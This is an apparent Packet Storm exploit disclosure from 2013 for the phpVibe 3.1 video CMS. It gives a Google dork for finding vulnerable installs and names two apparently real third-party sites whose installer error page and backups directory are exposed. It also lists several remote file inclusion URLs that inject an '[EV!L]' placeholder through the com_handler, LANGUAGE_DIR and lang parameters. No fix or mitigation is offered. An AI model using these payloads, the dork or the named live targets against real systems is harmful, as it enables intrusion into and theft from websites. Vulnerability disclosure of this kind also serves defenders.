phpVibe 3.1 Disclosure / Remote File Inclusion

2013-07-06T00:00:00
ID PACKETSTORM:122300
Type packetstorm
Reporter indoushka
Modified 2013-07-06T00:00:00

Description

                                        
                                            `##########################################  
# Exploit Title: phpVibe 3.1 Multiple Vulnerability  
# Date: 2013-05-07  
# Author: indoushka  
# Software Link: http://phprevolution.com/  
# Category: webapps/php  
# Version: 3.1  
# Price: 40€  
# Google dork: "Powered by phpVibe v3.1"  
##########################################  
  
installation Application error message :  
  
http://www.supervideo.org/setup/application/views/displays//install/step-3.php  
  
Backups :  
  
http://gasandfoodvideo.com/setup/application/views/displays/modules/backups/  
  
RFI :  
  
http://localhost/phpVibe/index.php?com_handler=[EV!L]  
  
http://localhost/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]  
  
http://localhost/phpVibe/app/classes/language.php?lang=[EV!L]  
  
http://localhost/phpVibe/app/classes/language.php?LANGUAGE_DIR=[EV!L]  
  
http://localhost/phpVibe/app/classes/language.php?lang=[EV!L]  
`